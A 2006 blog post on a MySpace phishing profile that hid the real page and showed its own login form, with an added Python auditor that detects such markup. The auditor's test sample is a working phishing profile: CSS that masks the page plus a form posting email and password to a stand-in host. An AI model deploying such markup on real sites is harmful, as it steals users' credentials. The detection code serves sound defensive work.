Tuesday, October 31, 2006

myspace phishing

I saw this on SlashDot yesterday, about a hack that is out there:

"The hackers have engineered a fake login form on MySpace's own web site. Netcraft has notified MySpace of the issue, although it currently remains live. Because the fraudulent login page is hosted on MySpace's own servers and does not exhibit any signs of external content, such as cross-site scripting or open redirects, it is convincing and even security-conscious users are at risk of becoming victims. The attack is launched from a profile page, where the username is login_home_index_html, and uses specially-crafted HTML in order to hide the genuine MySpace content from the page and instead display its own login form."
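The technique described above works because the site renders user-supplied profile HTML inline, so a profile can carry its own `<form>` and the CSS to hide the real page around it. The following is an added example, not code from this post, from Netcraft or from MySpace: a small server-side auditor that scans profile markup for exactly those two ingredients, a credential-capturing form (a password field, or a form whose `action` posts to a host outside the site) and CSS that hides or covers the host page. The trusted host set, the hypothetical function names and the two sample profiles (including the 203.0.113.5 address) are constructed assumptions for the demo.

```python
"""Heuristic audit of user-supplied profile markup for a hosted fake login form.

Added example, not MySpace's code. It assumes the site renders user HTML
inline (as MySpace did in 2006) and that only TRUSTED_FORM_HOSTS may
legitimately receive a submitted form. Two classes of signal:
  * hard: a password field anywhere in user markup, or a <form> whose action
    posts to an untrusted host (credential capture)
  * soft: CSS that hides content (display:none / visibility:hidden) or lays a
    positioned element over the page (used to mask the genuine page)
"""
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

TRUSTED_FORM_HOSTS = {"myspace.com", "www.myspace.com"}  # assumption for the demo

HIDE_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
COVER_RE = re.compile(r"position\s*:\s*(absolute|fixed)", re.I)
ZINDEX_RE = re.compile(r"z-index\s*:\s*(\d+)", re.I)


class ProfileMarkupAuditor(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.hard = []   # findings that justify blocking the profile
        self.soft = []   # supporting signals (page-masking CSS)
        self._in_style = False

    def _check_css(self, css, where):
        if HIDE_RE.search(css):
            self.soft.append(f"{where}: hides content")
        if COVER_RE.search(css):
            m = ZINDEX_RE.search(css)
            z = int(m.group(1)) if m else 0
            self.soft.append(f"{where}: positioned overlay (z-index {z})")

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "style":
            self._in_style = True
        elif tag == "form":
            host = urlparse(a.get("action", "")).hostname
            if host is None:
                # relative action: submits to the site itself; worth a look, not a block
                self.soft.append("form with empty/relative action in user markup")
            elif host.lower() not in TRUSTED_FORM_HOSTS:
                self.hard.append(f"form posts to untrusted host {host}")
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.hard.append("password field in user markup")
        if a.get("style"):
            self._check_css(a["style"], f"<{tag} style>")

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False

    def handle_data(self, data):
        if self._in_style:
            self._check_css(data, "<style> block")


def audit_profile_markup(html):
    """Return hard/soft findings and a block decision for one profile's HTML."""
    p = ProfileMarkupAuditor()
    p.feed(html)
    p.close()
    return {"hard": p.hard, "soft": p.soft, "block": bool(p.hard)}


# Constructed sample: a profile that hides the real page and shows its own login form.
PHISHING_PROFILE = """
<style>
  #content, #header, table.profile { display: none; }
</style>
<div style="position:absolute;top:0;left:0;width:100%;height:100%;background:#fff;z-index:9999">
  <h2>Sign in to MySpace</h2>
  <form action="http://203.0.113.5/login.php" method="post">
    <input name="email"> <input type="password" name="password">
    <input type="submit" value="Login">
  </form>
</div>
"""

# Constructed sample: ordinary decorative profile CSS, no form.
BENIGN_PROFILE = """
<style> body { background: url(bg.gif); } .about { color: #c0f; } </style>
<div class="about">Hi, I like music. <a href="http://www.myspace.com/somebody">my friend</a></div>
"""

if __name__ == "__main__":
    for name, markup in (("phishing", PHISHING_PROFILE), ("benign", BENIGN_PROFILE)):
        print(name, audit_profile_markup(markup))
```

The soft signals are deliberately not blocking on their own, since hiding default page sections with CSS was common in ordinary profile customisation; the combination of page-masking CSS with a form that collects a password or posts off-site is what characterises the attack quoted above.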

What's scary is that most users on MySpace are just that: users. They are not tech-savvy, and they can safely be assumed to know only enough to pretty up their profile pages by surfing Google and scraping some CSS off another website. So what if a hacker gets into a user's MySpace account? From there, they can take the obtained email address and password and start shopping them around to other sites, since most users reuse the same password and email address everywhere. It's a big gaping hole, and, well, MySpace is just a poorly written piece of software.

